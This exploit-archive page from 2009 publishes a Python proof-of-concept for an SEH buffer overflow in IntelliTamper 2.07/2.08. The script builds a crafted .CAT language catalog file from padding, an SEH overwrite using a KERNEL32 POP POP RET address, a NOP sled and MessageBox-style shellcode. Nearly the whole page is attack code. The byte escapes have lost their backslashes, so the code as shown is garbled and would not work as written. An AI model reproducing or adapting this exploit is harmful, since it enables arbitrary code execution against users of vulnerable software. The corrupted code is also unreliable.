IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit
# Published : 2009-01-08
# Author : Cnaph
# Previous Title : GOM Player 2.0.12.3375 (.ASX File) Stack Overflow Exploit
# Next Title : Cain & Abel 4.9.25 (Cisco IOS-MD5) Local Buffer Overflow Exploit

#!usr/bin/python
# IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit.
    # we start off the exploitation with some fuzzing to determine how many bytes
    # before overwriting the pointer to next SEH
    # and pointer to SEH, we will try and overwrite each address with 41414141 "AAAA" [Pointer to next SEH]
    # and 42424242 "BBBB" [pointer to SEH].
   
# 0x41414141  Pointer to next SEH record
# 0x42424242  SE handler
#
# The vulnerability was discovered by 'Cnaph'. First click in "File" through your IntelliTamper and >> "Options"
# Then open your crafted file .CAT to update your Language catalog and your SEH will be overwritten.
# This exploit implements the SEH technique to exploit the issue . . .
# When doing SEH overwrites the pointer to the SEH handler is target to be overwritten,
# so we can gain control over the program.
#/Cnaph.
print "[+] IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit.";
Variable = "x24x30x30x30x38x30x3D";
Junks =("x41"*761)+("x91"*19702)+(106*"x41")
Nex_SEHHandler = "xebx06x90x90"; # JMP
SEH_handler = "x61xfbx86x7c"; # SE.42424242 le SEH handler est ecras??.
                         # L'addresse de d??placement de l'indicateur SEH va etre chang??.
                         # KERNEL32.DLL (CALL EBX POP POP RET)
NOP_SLED = "x90"*12
Shellcode =((("x31xc0x31xdbx31xc9x31xd2xebx37x59x88x51x0axbb"
              "x77x1dx80x7c" #LoadlibaryA(libaryname)
              "x51xffxd3xebx39x59x31xd2x88x51x0bx51x50xbb"
              "x28xacx80x7c" #GetProcAddress(hmodule,functionname)
              "xffxd3xebx39x59x31xd2x88x51x06x31xd2x52x51"
              "x51x52xffxd0x31xd2x50xb8xa2xcax81x7cxffxd0xe8xc4xff"
              "xffxffx75x73x65x72x33x32x2ex64x6cx6cx4exe8xc2xffxff"
              "xffx4dx65x73x73x61x67x65x42x6fx78x41x4exe8xc2xffxff"
              "xffx63x4Ex34x70x68x75x78"))); #
Plus = "nnnn"
Seh_overwrite = Variable + Junks + Nex_SEHHandler + SEH_handler + NOP_SLED + Shellcode
genre = ".CAT";
Title = "IntelliTamper_DZ";
headers = open(Title + genre, "w")
headers.write(Seh_overwrite)
headers.close()
print "[+] Exploit file has been successfully built.";
print "nCnaph.";

# www.Syue.com [2009-01-08]